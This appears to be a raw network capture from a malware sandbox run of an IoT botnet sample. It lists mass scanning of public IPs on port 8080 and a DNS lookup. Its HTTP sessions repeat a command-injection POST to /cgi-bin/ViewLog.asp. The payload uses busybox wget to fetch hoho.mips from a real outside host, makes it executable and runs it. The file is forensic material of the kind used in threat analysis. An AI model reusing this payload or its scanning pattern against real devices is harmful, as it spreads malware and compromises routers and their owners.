                                              Nov 23, 2023 05:14:52.338411093 CET542028080192.168.2.1394.190.190.171
                                              Nov 23, 2023 05:14:52.338417053 CET542028080192.168.2.1385.15.132.221
                                              Nov 23, 2023 05:14:52.338417053 CET542028080192.168.2.1385.5.128.142
                                              Nov 23, 2023 05:14:52.338417053 CET542028080192.168.2.1362.188.208.143
                                              Nov 23, 2023 05:14:52.338424921 CET542028080192.168.2.1395.4.218.132
                                              Nov 23, 2023 05:14:52.338424921 CET542028080192.168.2.1395.202.77.90
                                              Nov 23, 2023 05:14:52.338424921 CET542028080192.168.2.1395.252.63.19
                                              Nov 23, 2023 05:14:52.338424921 CET542028080192.168.2.1395.196.253.158
                                              Nov 23, 2023 05:14:52.338424921 CET542028080192.168.2.1394.51.35.120
                                              Nov 23, 2023 05:14:52.338424921 CET542028080192.168.2.1395.108.87.189
                                              Nov 23, 2023 05:14:52.338424921 CET542028080192.168.2.1394.38.68.87
                                              Nov 23, 2023 05:14:52.338433981 CET542028080192.168.2.1362.204.33.57
                                              Nov 23, 2023 05:14:52.338433981 CET542028080192.168.2.1394.247.190.164
                                              Nov 23, 2023 05:14:52.338454962 CET542028080192.168.2.1395.50.119.20
                                              Nov 23, 2023 05:14:52.338454962 CET542028080192.168.2.1385.243.36.104
                                              Nov 23, 2023 05:14:52.338454962 CET542028080192.168.2.1362.185.219.187
                                              Nov 23, 2023 05:14:52.338454962 CET542028080192.168.2.1385.186.102.139
                                              Nov 23, 2023 05:14:52.338454962 CET542028080192.168.2.1385.4.69.47
                                              Nov 23, 2023 05:14:52.338478088 CET542028080192.168.2.1362.201.65.102
                                              Nov 23, 2023 05:14:52.338485956 CET542028080192.168.2.1385.23.254.73
                                              Nov 23, 2023 05:14:52.338485956 CET542028080192.168.2.1394.107.141.22
                                              Nov 23, 2023 05:14:52.338485956 CET542028080192.168.2.1394.6.116.210
                                              Nov 23, 2023 05:14:52.338490963 CET542028080192.168.2.1395.59.42.109
                                              Nov 23, 2023 05:14:52.338521004 CET542028080192.168.2.1395.250.168.76
                                              Nov 23, 2023 05:14:52.338521004 CET542028080192.168.2.1394.140.166.91
                                              Nov 23, 2023 05:14:52.338524103 CET542028080192.168.2.1362.242.238.79
                                              Nov 23, 2023 05:14:52.338524103 CET542028080192.168.2.1385.224.96.242
                                              Nov 23, 2023 05:14:52.338524103 CET542028080192.168.2.1395.35.166.132
                                              Nov 23, 2023 05:14:52.338524103 CET542028080192.168.2.1331.203.80.69
                                              Nov 23, 2023 05:14:52.338532925 CET542028080192.168.2.1394.74.254.69
                                              Nov 23, 2023 05:14:52.338532925 CET542028080192.168.2.1395.156.247.220
                                              Nov 23, 2023 05:14:52.338537931 CET542028080192.168.2.1394.134.221.123
                                              Nov 23, 2023 05:14:52.338537931 CET542028080192.168.2.1394.205.130.136
                                              Nov 23, 2023 05:14:52.338537931 CET542028080192.168.2.1362.133.211.92
                                              Nov 23, 2023 05:14:52.338540077 CET542028080192.168.2.1362.30.66.97
                                              Nov 23, 2023 05:14:52.338537931 CET542028080192.168.2.1394.120.28.54
                                              Nov 23, 2023 05:14:52.338537931 CET542028080192.168.2.1395.7.185.192
                                              Nov 23, 2023 05:14:52.338537931 CET542028080192.168.2.1362.210.58.110
                                              Nov 23, 2023 05:14:52.338537931 CET542028080192.168.2.1362.114.93.42
                                              Nov 23, 2023 05:14:52.338558912 CET542028080192.168.2.1395.91.253.47
                                              Nov 23, 2023 05:14:52.338587999 CET542028080192.168.2.1394.140.254.185
                                              Nov 23, 2023 05:14:52.338591099 CET542028080192.168.2.1385.125.173.49
                                              Nov 23, 2023 05:14:52.338591099 CET542028080192.168.2.1331.188.188.204
                                              Nov 23, 2023 05:14:52.338591099 CET542028080192.168.2.1385.55.70.23
                                              Nov 23, 2023 05:14:52.338618994 CET542028080192.168.2.1385.190.199.225
                                              Nov 23, 2023 05:14:52.338618994 CET542028080192.168.2.1395.176.222.202
                                              Nov 23, 2023 05:14:52.338624001 CET542028080192.168.2.1331.56.78.0
                                              Nov 23, 2023 05:14:52.338624954 CET542028080192.168.2.1362.101.136.80
                                              Nov 23, 2023 05:14:52.338625908 CET542028080192.168.2.1385.64.234.232
                                              Nov 23, 2023 05:14:52.338624954 CET542028080192.168.2.1362.128.152.104
                                              Nov 23, 2023 05:14:52.338624001 CET542028080192.168.2.1385.93.62.17
                                              Nov 23, 2023 05:14:52.338624954 CET542028080192.168.2.1362.231.53.96
                                              Nov 23, 2023 05:14:52.338625908 CET542028080192.168.2.1395.119.118.163
                                              Nov 23, 2023 05:14:52.338624954 CET542028080192.168.2.1362.163.243.221
                                              Nov 23, 2023 05:14:52.338624954 CET542028080192.168.2.1362.142.240.192
                                              Nov 23, 2023 05:14:52.338624954 CET542028080192.168.2.1331.137.145.35
                                              Nov 23, 2023 05:14:52.338624954 CET542028080192.168.2.1331.128.199.38
                                              Nov 23, 2023 05:14:52.338637114 CET542028080192.168.2.1385.177.176.153
                                              Nov 23, 2023 05:14:52.338637114 CET542028080192.168.2.1362.207.122.252
                                              Nov 23, 2023 05:14:52.338637114 CET542028080192.168.2.1331.185.155.96
                                              Nov 23, 2023 05:14:52.338637114 CET542028080192.168.2.1362.137.155.39
                                              Nov 23, 2023 05:14:52.338656902 CET542028080192.168.2.1385.157.227.254
                                              Nov 23, 2023 05:14:52.338668108 CET542028080192.168.2.1394.65.223.169
                                              Nov 23, 2023 05:14:52.338675976 CET542028080192.168.2.1385.197.225.49
                                              Nov 23, 2023 05:14:52.338692904 CET542028080192.168.2.1385.127.127.187
                                              Nov 23, 2023 05:14:52.338706017 CET542028080192.168.2.1385.110.174.56
                                              Nov 23, 2023 05:14:52.338706017 CET542028080192.168.2.1331.138.243.213
                                              Nov 23, 2023 05:14:52.338706017 CET542028080192.168.2.1395.149.25.146
                                              Nov 23, 2023 05:14:52.338706017 CET542028080192.168.2.1395.198.203.142
                                              Nov 23, 2023 05:14:52.338706017 CET542028080192.168.2.1385.7.153.141
                                              Nov 23, 2023 05:14:52.338717937 CET542028080192.168.2.1395.35.70.102
                                              Nov 23, 2023 05:14:52.338717937 CET542028080192.168.2.1362.144.227.192
                                              Nov 23, 2023 05:14:52.338717937 CET542028080192.168.2.1395.130.93.29
                                              Nov 23, 2023 05:14:52.338727951 CET542028080192.168.2.1385.116.118.179
                                              Nov 23, 2023 05:14:52.338727951 CET542028080192.168.2.1394.77.102.153
                                              Nov 23, 2023 05:14:52.338732958 CET542028080192.168.2.1385.178.36.61
                                              Nov 23, 2023 05:14:52.338738918 CET542028080192.168.2.1394.162.158.236
                                              Nov 23, 2023 05:14:52.338738918 CET542028080192.168.2.1362.38.28.200
                                              Nov 23, 2023 05:14:52.338738918 CET542028080192.168.2.1385.216.69.187
                                              Nov 23, 2023 05:14:52.338738918 CET542028080192.168.2.1362.81.74.190
                                              Nov 23, 2023 05:14:52.338738918 CET542028080192.168.2.1385.126.77.137
                                              Nov 23, 2023 05:14:52.338738918 CET542028080192.168.2.1395.84.123.44
                                              Nov 23, 2023 05:14:52.338757038 CET542028080192.168.2.1385.75.134.19
                                              Nov 23, 2023 05:14:52.338758945 CET542028080192.168.2.1362.116.61.101
                                              Nov 23, 2023 05:14:52.338774920 CET542028080192.168.2.1362.192.238.212
                                              Nov 23, 2023 05:14:52.338782072 CET542028080192.168.2.1331.206.198.175
                                              Nov 23, 2023 05:14:52.338782072 CET542028080192.168.2.1362.28.98.123
                                              Nov 23, 2023 05:14:52.338789940 CET542028080192.168.2.1385.105.137.247
                                              Nov 23, 2023 05:14:52.338789940 CET542028080192.168.2.1362.192.64.212
                                              Nov 23, 2023 05:14:52.338800907 CET542028080192.168.2.1385.68.245.232
                                              Nov 23, 2023 05:14:52.338800907 CET542028080192.168.2.1385.213.101.246
                                              Nov 23, 2023 05:14:52.338800907 CET542028080192.168.2.1394.156.87.87
                                              Nov 23, 2023 05:14:52.338800907 CET542028080192.168.2.1331.13.6.174
                                              Nov 23, 2023 05:14:52.338800907 CET542028080192.168.2.1385.221.223.253
                                              Nov 23, 2023 05:14:52.338800907 CET542028080192.168.2.1331.117.97.136
                                              Nov 23, 2023 05:14:52.338800907 CET542028080192.168.2.1395.45.65.229
                                              Nov 23, 2023 05:14:52.338800907 CET542028080192.168.2.1362.233.19.148
                                              Nov 23, 2023 05:14:52.338802099 CET542028080192.168.2.1394.66.42.214
                                              Nov 23, 2023 05:14:52.338800907 CET542028080192.168.2.1385.116.25.94
                                              Nov 23, 2023 05:14:52.338803053 CET542028080192.168.2.1331.246.140.164
                                              Nov 23, 2023 05:14:52.338800907 CET542028080192.168.2.1385.197.210.87
                                              Nov 23, 2023 05:14:52.338816881 CET542028080192.168.2.1395.103.154.195
                                              Nov 23, 2023 05:14:52.338819027 CET542028080192.168.2.1331.157.143.122
                                              Nov 23, 2023 05:14:52.338819981 CET542028080192.168.2.1394.206.234.63
                                              Nov 23, 2023 05:14:52.338820934 CET542028080192.168.2.1331.191.166.78
                                              Nov 23, 2023 05:14:52.338844061 CET542028080192.168.2.1385.178.206.237
                                              Nov 23, 2023 05:14:52.338843107 CET542028080192.168.2.1362.240.209.74
                                              Nov 23, 2023 05:14:52.338844061 CET542028080192.168.2.1395.145.187.59
                                              Nov 23, 2023 05:14:52.338845968 CET542028080192.168.2.1394.14.50.174
                                              Nov 23, 2023 05:14:52.338845015 CET542028080192.168.2.1331.4.165.53
                                              Nov 23, 2023 05:14:52.338856936 CET542028080192.168.2.1395.176.80.91
                                              Nov 23, 2023 05:14:52.338859081 CET542028080192.168.2.1394.136.206.198
                                              Nov 23, 2023 05:14:52.338876009 CET542028080192.168.2.1331.246.178.83
                                              Nov 23, 2023 05:14:52.338884115 CET542028080192.168.2.1331.173.74.14
                                              Nov 23, 2023 05:14:52.338891029 CET542028080192.168.2.1331.84.155.172
                                              Nov 23, 2023 05:14:52.338896990 CET542028080192.168.2.1395.252.90.254
                                              Nov 23, 2023 05:14:52.338896990 CET542028080192.168.2.1331.229.139.174
                                              Nov 23, 2023 05:14:52.338901043 CET542028080192.168.2.1394.225.153.237
                                              Nov 23, 2023 05:14:52.338902950 CET542028080192.168.2.1362.180.26.55
                                              Nov 23, 2023 05:14:52.338917017 CET542028080192.168.2.1395.61.32.149
                                              Nov 23, 2023 05:14:52.338932037 CET542028080192.168.2.1394.179.176.45
                                              Nov 23, 2023 05:14:52.338937998 CET542028080192.168.2.1362.44.144.238
                                              Nov 23, 2023 05:14:52.338937044 CET542028080192.168.2.1395.42.110.69
                                              Nov 23, 2023 05:14:52.338949919 CET542028080192.168.2.1395.101.171.47
                                              Nov 23, 2023 05:14:52.338957071 CET542028080192.168.2.1331.177.218.80
                                              Nov 23, 2023 05:14:52.338962078 CET542028080192.168.2.1394.75.15.127
                                              Nov 23, 2023 05:14:52.338962078 CET542028080192.168.2.1362.233.80.225
                                              Nov 23, 2023 05:14:52.338962078 CET542028080192.168.2.1394.213.77.127
                                              Nov 23, 2023 05:14:52.338973999 CET542028080192.168.2.1362.17.121.122
                                              Nov 23, 2023 05:14:52.338985920 CET542028080192.168.2.1395.248.179.112
                                              Nov 23, 2023 05:14:52.338984966 CET542028080192.168.2.1394.93.44.107
                                              Nov 23, 2023 05:14:52.338985920 CET542028080192.168.2.1395.136.207.194
                                              Nov 23, 2023 05:14:52.338999033 CET542028080192.168.2.1394.80.79.198
                                              Nov 23, 2023 05:14:52.339006901 CET542028080192.168.2.1394.51.254.208
                                              Nov 23, 2023 05:14:52.339013100 CET542028080192.168.2.1362.222.174.125
                                              Nov 23, 2023 05:14:52.339023113 CET542028080192.168.2.1395.198.52.185
                                              Nov 23, 2023 05:14:52.339023113 CET542028080192.168.2.1394.137.235.91
                                              Nov 23, 2023 05:14:52.339030981 CET542028080192.168.2.1394.191.204.56
                                              Nov 23, 2023 05:14:52.339034081 CET542028080192.168.2.1331.55.113.98
                                              Nov 23, 2023 05:14:52.339044094 CET542028080192.168.2.1395.148.107.251
                                              Nov 23, 2023 05:14:52.339049101 CET542028080192.168.2.1395.191.10.91
                                              Nov 23, 2023 05:14:52.339062929 CET542028080192.168.2.1385.121.22.150
                                              Nov 23, 2023 05:14:52.339063883 CET542028080192.168.2.1394.116.137.98
                                              Nov 23, 2023 05:14:52.339068890 CET542028080192.168.2.1394.61.134.88
                                              Nov 23, 2023 05:14:52.339076996 CET542028080192.168.2.1362.154.210.135
                                              Nov 23, 2023 05:14:52.339080095 CET542028080192.168.2.1385.53.160.117
                                              Nov 23, 2023 05:14:52.339082003 CET542028080192.168.2.1385.120.99.175
                                              Nov 23, 2023 05:14:52.339092016 CET542028080192.168.2.1331.21.67.8
                                              Nov 23, 2023 05:14:52.339099884 CET542028080192.168.2.1394.218.37.34
                                              Nov 23, 2023 05:14:52.339114904 CET542028080192.168.2.1331.188.55.230
                                              Nov 23, 2023 05:14:52.339114904 CET542028080192.168.2.1394.40.188.95
                                              Nov 23, 2023 05:14:52.339117050 CET542028080192.168.2.1362.82.142.126
                                              Nov 23, 2023 05:14:52.339118004 CET542028080192.168.2.1331.162.132.4
                                              Nov 23, 2023 05:14:52.339118004 CET542028080192.168.2.1362.123.85.134
                                              Nov 23, 2023 05:14:52.339138985 CET542028080192.168.2.1394.125.217.99
                                              Nov 23, 2023 05:14:52.339138985 CET542028080192.168.2.1394.63.171.1
                                              Nov 23, 2023 05:14:52.339140892 CET542028080192.168.2.1385.32.194.136
                                              Nov 23, 2023 05:14:52.339154005 CET542028080192.168.2.1395.29.201.101
                                              Nov 23, 2023 05:14:52.339154959 CET542028080192.168.2.1394.251.248.52
                                              Nov 23, 2023 05:14:52.339164972 CET542028080192.168.2.1362.12.102.166
                                              Nov 23, 2023 05:14:52.339168072 CET542028080192.168.2.1395.126.99.166
                                              Nov 23, 2023 05:14:52.339179039 CET542028080192.168.2.1394.160.146.47
                                              Nov 23, 2023 05:14:52.339184046 CET542028080192.168.2.1362.107.102.17
                                              Nov 23, 2023 05:14:52.339199066 CET542028080192.168.2.1362.74.38.91
                                              Nov 23, 2023 05:14:52.339204073 CET542028080192.168.2.1331.173.211.187
                                              Nov 23, 2023 05:14:52.339206934 CET542028080192.168.2.1395.107.240.9
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Nov 23, 2023 05:17:33.211975098 CET192.168.2.131.1.1.10x483aStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                              Nov 23, 2023 05:17:33.211975098 CET192.168.2.131.1.1.10x4333Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Nov 23, 2023 05:17:33.346791983 CET1.1.1.1192.168.2.130x483aNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                              Nov 23, 2023 05:17:33.346791983 CET1.1.1.1192.168.2.130x483aNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                              Session IDSource IPSource PortDestination IPDestination Port
                                              0192.168.2.135573847.104.39.3423
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:47.951337099 CET121INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 0a
                                              Data Ascii: Unauthorized ...IP Address:


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1192.168.2.133615431.136.47.508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:50.817152977 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:53.990777969 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:00.134710073 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:12.166712046 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:36.486605883 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:25.638484001 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2192.168.2.134770095.86.82.1758080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:50.865978003 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3192.168.2.134832085.69.27.1568080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:50.995425940 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:51.558868885 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:52.646734953 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:55.014750957 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:59.366714001 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:08.070688963 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
